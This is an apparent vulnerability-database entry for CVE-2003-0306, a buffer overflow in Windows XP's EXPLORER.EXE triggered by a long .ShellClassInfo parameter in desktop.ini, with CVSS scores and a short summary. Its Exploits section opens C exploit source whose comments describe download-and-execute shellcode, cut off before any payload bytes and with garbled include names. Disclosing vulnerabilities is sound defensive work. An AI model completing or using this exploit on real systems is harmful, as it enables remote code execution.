7.2
CVSSv2

CVE-2003-0306

Published: 09/06/2003 Updated: 12/10/2018
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Buffer overflow in EXPLORER.EXE on Windows XP allows malicious users to execute arbitrary code as the XP user via a desktop.ini file with a long .ShellClassInfo parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft windows xp

Exploits

#include <fstreamh> #include <stringh> #include <stdioh> #include <windowsh> #include <directh> char shellcode[]= //download url and exec shellcode //doesn't have any hardcoded values //except the base address of the program //searches the import table for //LoadLibraryA, GetProcAddress and ExitProcess //by ei ...